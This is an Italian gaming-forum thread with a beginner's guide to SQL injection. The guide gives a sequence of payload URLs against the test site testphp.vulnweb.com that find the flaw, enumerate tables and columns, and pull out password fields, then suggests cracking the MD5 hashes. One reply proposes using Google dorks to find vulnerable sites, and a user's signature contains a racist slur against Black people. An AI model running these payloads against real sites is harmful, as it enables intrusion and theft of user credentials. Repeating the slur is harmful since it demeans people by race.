Salve ospite, se leggi questo messaggio vuol dire che non sei registrato, cosa aspetti ? Premi qui per registrarti La registrazione è completamente gratuita e ti permetterà di usufruire di tutte le funzionalità del nostro forum. Buona navigazione.


Vendo, Compro, Scambio NosTale! Riapre il Black Market, concludi i tuoi scambi NosTale gratuitamente! Più info  -   Accedi alla sezione
Download file Server : File Retro Server NosTale
Visita la nuova sezione di BorderGame dedicata a Blade & Soul! Sezione Blade and Soul

 
Valutazione discussione:
  • 5 voti - 4.4 media
  • 1
  • 2
  • 3
  • 4
  • 5
[GUIDA] SQL Injection
27-03-2013 10:22 PM
Messaggio: #1
[GUIDA] SQL Injection
scl
*
Utente Saggio

Inizio a capire

Messaggi : 249

Registrato dal : Nov 2012

Reputazione : 166

Stato : Offline


Premi :



Ciao gente, da qualche giorno a questa parte dopo aver completato il mio ultimo sito un mio compagno di classe mi ha mostrato cosa poteva fare attraverlo le sql injection, così allora mi sono avventurato pure io in questa nuova avventura. Premetto che non sono un esperto, per cui ieri ho dato anche qualche nozione a @[~SilverNik], ma comunque sia cominciamo..
Tutti i test legali, possibili e immaginabili sulle iniezioni le faremo su: http://testphp.vulnweb.com/index.php ovvero un sito nato appositamente per questo.
Dato che non sono un esperto vi elenco degli utili comandi che utilizzo per scoprire le tabelle e poi i loro records. Cominciamo!

Il modo più semplice per vedere se un sito ha delle falle è utilizzare l'apice " ' ", applichiamolo dopo il target dato dall'url php.
Codice:
http://testphp.vulnweb.com/listproducts.php?cat=1'
Se da un qualsiasi tipo di errore, vuol dire che il sito è attaccabile, adesso scopriamo quante colonne possiede il db utilizzando questo codice:
Codice:
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 2--
vi è il numero due poichè se c'è un db e non ci sono errori la prima colonna c'è per forza, di conseguenza testiamo con 3,4,5 etc..
Ho gia svolto io il lavoro per voi e vi dico che ci sono 11 colonne, per cui adesso controlliamo la versione di sql scrivendo:
Codice:
http://testphp.vulnweb.com/listproducts.php?cat=1 union all select 1,@@version,3,4,5,6,7,8,9,10,11--
una volta trovato possiamo passare al controllo dei campi.
Per passare ai records, dobbiamo conoscere la struttura della tabella e dei suoi campi per cui scriviamo:
Codice:
http://testphp.vulnweb.com/listproducts.php?cat=1 union all select 1,table_name,3,4,5,6,7,8,9,10,11 FROM information_schema.tables--
adesso avrete una vasta lista, prendete il nome della tabelle che volete controllare e scrivete:
Codice:
http://testphp.vulnweb.com/listproducts.php?cat=1 union all select 1,column_name,3,4,5,6,7,8,9,10,11 FROM information_schema.columns where table_name="qui_metto_il_nome_della_tabella"--
.
Adesso miei piccoli hackers siamo giunti al termine, leggiamo il campo che cercavamo:
Codice:
http://testphp.vulnweb.com/listproducts.php?cat=1 union all select 1,nome_del_campo_per_esempio:password,3,4,5,6,7,8,9,10,11 FROM nometabella--
Fatto ciò il sito vi restituirà automaticamente il dato cercato, spesso sono crittografati in MD5, per cui basta andare qui(http://md5-hash-online.waraxe.us/) e decrittografare.

Ci sono diversi altri metodi per eseguire le famose sql injection, io vi ho presentato il più semplice però chi vuole continuare a giochicchiarci provi sqlmap, farete tutto tramite shell, il divertimento è assicurato.
per assistenza scrivimi su skype (contatto tramite pm) oppure taggami sul forum
(Questo messaggio è stato modificato l'ultima volta il: 27-03-2013 10:25 PM da scl.)
Torna al primo messaggio
Email Cerca Rispondi
29-03-2013 12:40 PM
Messaggio: #2
RE: [GUIDA] SQL Injection
~Giorigo1~
*
Minecraft
NosTale
Utente Saggio
Utente Storico

NosMerda D:

Messaggi : 704

Registrato dal : Feb 2012

Reputazione : 109

Stato : Offline


Premi :



@[scl] carina la guida Big Grin : +1
Ti consiglierei anche di inserire le Dork per trovare siti vulnerabili con google.
I Negri sono pregati di stare lontani dalla mia firma.
Torna al primo messaggio
Email Cerca Rispondi
06-04-2013 07:56 PM
Messaggio: #3
RE: [GUIDA] SQL Injection
‎iConnect
Bannati
Utente Saggio
Utente Storico

Utente Pro

Messaggi : 1,147

Registrato dal : Mar 2012


Stato : Away


Premi :



Guida ottima bravo
Torna al primo messaggio
Email Cerca Rispondi
24-06-2013 10:43 PM
Messaggio: #4
RE: [GUIDA] SQL Injection
return
Elite Coder
JC Group
NosTale
Utente Saggio
Utente Storico

Elite Coder

Messaggi : 396

Registrato dal : Feb 2013

Reputazione : 67

Stato : Offline


Premi :



Sqlmap resta il migliore xD io lo utilizzo con kali linux
Le droghe,l'acool,
l'erba , l'apatia , i medicinali,
l'amore per questa m**da ,
i vostri 'script' tutti uguali.
Torna al primo messaggio
Email Cerca Rispondi
25-07-2013 09:58 PM
Messaggio: #5
RE: [GUIDA] SQL Injection
Malware
*

Novizio

Messaggi : 8

Registrato dal : Jul 2013

Reputazione : 1

Stato : Offline


Premi :



Carino.

PS: Ricorda che una stringa criptata in MD5 non è decriptabile.
Il quel sito non criptare e poi decriptare la stringa, decriptane una e basta.
Ogni volta che ne scripti una salva nel db la stringa e il risultato md5 così poi quando scrivi l'md5 guarda nel db la stringa non criptata.

Ho spiegato da cani ma vabbé
Torna al primo messaggio
Email Cerca Rispondi

PubblicitàLa tua pubblicità qui, clicca per informazioni e per le offerte!

Stanno visualizzando la discussione :

  • Versione stampabile
  • Invia ad un amico
  • Sottoscrivi questa discussione